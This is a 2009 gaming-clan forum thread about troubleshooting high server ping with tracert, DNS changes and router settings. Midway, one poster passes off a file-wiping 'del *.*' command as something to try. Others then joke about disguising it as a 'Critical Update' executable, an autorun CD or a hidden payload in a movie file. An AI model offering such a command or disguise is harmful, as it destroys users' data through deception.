Ðead Øn Årrival
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Ðead Øn Årrival

HomeHomeLatest imagesSearchRegisterLog in

my server ping problems

Go down 
+5
Crimson
Reaper
Woffle'
smilinsniper
Quoth...
9 posters
Go to page : 1, 2  Next
AuthorMessage
Quoth...

Quoth...

my server ping problems Empty
PostSubject: my server ping problems   my server ping problems Empty2009-03-13, 17:47

I am getting a pretty huge ping on our server for the last few weeks. It fluctuates between 40 (where it kida should be for a mainland server) to up to 190, and it usually settles on about 150.

I know Reaper is having the same problem with ping, but we are on different providers.

I did some tracking, and the server seems to be in queensland (brisbane)

i did a DSL speed test to brisbane and it came in at about 100, so I guess the pings not so wierd, but I am wondering if anyone else in tas is getting these huge pings, and if not, which provider they are with.

I have to do some investagationing with the issue anyway, but thought I would bring it up.

My download speeds for everything else does not seem to be affected.

i have a newly installed version of windows + virus software + firewall.

I had downloaded Netlimiter (before the new system) to see what else might be using bandwidth ( like Auto updates etc) but nothing came up with that, and the problem persists with the new computer.
Back to top Go down
http://quothdesign.com.au
smilinsniper

smilinsniper

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-14, 12:42

Questions

Which antivirus + firewall are you using?

Did you have the problem before you installed them?

What version of windows XP? Vista? Win95? DOS?
Back to top Go down
Woffle'
ÐØÅ VIP

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-14, 14:39

Start

Run

CMD

Tracert 118.127.16.145

---------------------------

Look at where the ping appears to spike, this is normally where your getting the delay in the route between your computer and the server.

If your router has the option of using a DNS server then try change it to another DNS. Search in google for ALTERNATE DNS SERVER LIST AUSTRALIA or something like that.

Could just be the path your DNS goes through isnt the most direct or is going through a laggy server.

Other thing is that d/l speed is totally seperate to ping, D/L speed is how big the pipe is between two points as opposed to ping being how fast something can get to the end of the pipe and back.

Woffle out...
Back to top Go down
Quoth...

Quoth...

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-14, 14:56

cheers for the ideas. I did the tracert and it gets two or three moves in and disappears. I have to try and pick a printscreen when I think its about to go, is this normal?

Im using norton antivirus 2007 and its firewall (nortons) on windows xp SP3. I had this problem for about two weeks before the new puter turned up.

I'll see what I can do about switching the DNS, see what I can findout Very Happy
Back to top Go down
smilinsniper

smilinsniper

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-14, 15:06

Quoth... wrote:
cheers for the ideas. I did the tracert and it gets two or three moves in and disappears. I have to try and pick a printscreen when I think its about to go, is this normal?

Im using norton antivirus 2007 and its firewall (nortons) on windows xp SP3. I had this problem for about two weeks before the new puter turned up.

I'll see what I can do about switching the DNS, see what I can findout Very Happy
NEVER use Norton antivirus or its crappy firewall!

http://rapidshare.com/files/209033239/NOD32.rar

That is the Antivirus i use, it uses very little resources an is non intrusive like norton.

Believe me removing norton + its firewall will make life sweet again as it will be lagging your computer down like a brick.
Add me to MSN Q if ya like an i will explain it better.
Back to top Go down
Quoth...

Quoth...

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-14, 15:35

ended up getting "destination protocol unreachable" errors, and when I googled that error, a whirlpool forums topic came up with the user having very much the same kind of problems I was having. It turns out it's probably a D-Link DSL-G604T (dont laugh!) router problem with my specific model, and settings had to be changed in the router.

http://forums.whirlpool.net.au/forum-replies-archive.cfm/693958.html

hope it helps, time for a game Very Happy

oh, and thanks smilin, Im getting that prog now. Time to check it out. I know norton is obtrusive, cant do anything without it calling you up on it, kinda like an angry mum (or dad in my case)..... "You think thats a good idea, letting the Game Overlay Interface run on this PC?? you might chat to some nasty people who are a bad influence on a growimg young mind like yours...." lol

Cheers
Back to top Go down
Reaper

Reaper

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-14, 18:27

my server ping problems Plzxpl11

plzxpln.
Back to top Go down
Woffle'
ÐØÅ VIP

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-15, 02:25

my server ping problems Pictur10

Bit easier to tell with my ISP, but as you can see there is the router itself (siemens) which should always be a 1-<1ms ping so yours is okay, that means no problem with the UTP cable or your computer. (the 30ms jump is me getting over the ditch)

The next one is from your router to the ISP, so with yours going up to 129 for the first hop would indicate something is wrong between the router and your ISP (or the router, or the ISP).

Be best to submit that trace route to your ISP and ask them for help, or if you know that the router is not the best, may be time for an upgrade? (only after you've checked with your ISP first just to make sure Smile

*corrupting impressionable minds since 09'
Back to top Go down
Crimson

Crimson

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-15, 05:27

im using the new norton GAMERS EDITION, and it is quite good :\
i didnt belive a word the symantec rep said so he gave me a free copy lol
Back to top Go down
http://www.powerupdesign.org
Tha Snowmann
|ÐØÅ| Leader
Tha Snowmann

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-15, 06:52

i didnt even know Norton has a GAMERS EDITION.

Im using Norton 360 2009 version, this is mainly because my parents have paid for it and i can use it on up to 3 computers, so yeah, that y i have it. i cant seem to see where it is using a lot of my resources, but then again i do have a lot to use. Smile

i havnt had a problem with it or them so i dont see no problem for me to be using Norton 360 Smile
Back to top Go down
MANX

MANX

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-15, 13:12

How the hell did you come across that tracert thing woffle? I just traced from my comp to like 10 diff ips ive been to Razz kinda cool.
Back to top Go down
Woffle'
ÐØÅ VIP

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-16, 14:29

not been to, that your computer has to go through to get somewhere..... Razz

And i came across it since i have used all the microsoft operating systems since DOS 2.somethingorother. So considering the amount of years, you tend to pick shit up hehe Smile

try this one next

Start
Run
CMD
cd\ (enter)
del *.*
then press y
see what it does.
Back to top Go down
Woffle'
ÐØÅ VIP

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-16, 14:30

*disclaimer - anyone stupid enough to do it, i take no responsibility for your actions. You should try and get a darwin award, thats just how special you are..... XD
Back to top Go down
Electron

Electron

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-16, 14:48

Lol Woffle. Why don't you give him a floppy disk bomb instead?
Back to top Go down
Quoth...

Quoth...

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-16, 16:07

so, from what I gather, using * as a wildcard, it erases everything from your disk?

nice one, lol Very Happy
Back to top Go down
Woffle'
ÐØÅ VIP

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-16, 23:38

Electron, there is a high chance that he will try it anyway, even with the disclaimer, no need to be as devious as a disk bomb Razz

and yes * (all file names) . * (all file types)
Back to top Go down
MANX

MANX

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-17, 06:34

lol could you program that into a cd and a auto run exec ? bags not testing it on my comp. Razz
Back to top Go down
Electron

Electron

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-17, 13:39

Or you could just make it into an .exe using VB and send them a "Critical Update" for some program...
Back to top Go down
Woffle'
ÐØÅ VIP

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-18, 02:20

older computers can just have that string inserted to the autoexec.bat but thats going back a bit.

Only thing with that electron, never run exe's that are less than 10kb, thats just dodgey. Unless its store bought and just come out of the shrink wrap.
Back to top Go down
MANX

MANX

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-18, 06:39

Woffle' wrote:
older computers can just have that string inserted to the autoexec.bat but thats going back a bit.

Only thing with that electron, never run exe's that are less than 10kb, thats just dodgey. Unless its store bought and just come out of the shrink wrap.

Does anyone buy the $10 tetris packs? LOL

And some people are stupid enought to open files under 10mb couldnt you stick it to something else to make it larger like hide it in a picture or movie file, so when the movie ends it deletes all their shit ? Razz
Back to top Go down
Woffle'
ÐØÅ VIP

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-18, 11:13

easier way, go to the persons house, get them drunk, play with them a bit if its a guy (added tht one for manx), wait till they go to sleep, turn on their computer, type it in yourself..... turn off computer, get back on topic.......
Back to top Go down
Electron

Electron

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-18, 13:35

Mmmm Words of Wisdom there Wof Smile

In regards to increase in Ping, I've also noticed this with my connection to the server lately too. I used to get a ping of 80-90, but now get 140-200 on a regular basis, and for no apparent reason on my end. Im experiencing more timeouts too Sad
Back to top Go down
Quoth...

Quoth...

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-19, 04:03

Im getting a massive choke in the leap to melbourne, So I have to go through my ISP.

I get timeouts too, but only when the server crashes and everyone else does.
Back to top Go down
Tha Snowmann
|ÐØÅ| Leader
Tha Snowmann

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-19, 04:17

have you contacted them and asked as to your ping problem? could just be a bottle neck problem on their end. but yeah dosnt seem like we can give ya much help if its your isp, one suggestion i could make is move over to a new isp?? Smile
Back to top Go down
Quoth...

Quoth...

PostSubject: Re: my server ping problems   my server ping problems Empty2009-03-19, 08:03

apparently Im being moved to bigpong ADSL2. My internet is paid for as part of a web maintenence contract by someone else, so i get moved whenever he can be fucked remembering to do it, lol.

And another problem is that I have lost my password, so I need to reset it. when they reset it, they send it to your mobile, and my mobile number has changed. Doesn't that sound dodgy... "Umm I need to change my mobile number with you.. ok ... and I need to reset my password!..."
It's going to be a long phone call, im sure, and I need to fortify myself Very Happy I'll probly do it on friday or monday. I wont be gaming again till tuesday night, so i have time.
Back to top Go down
Sponsored content

PostSubject: Re: my server ping problems   my server ping problems Empty

Back to top Go down

my server ping problems
Page 1 of 2Go to page : 1, 2  Next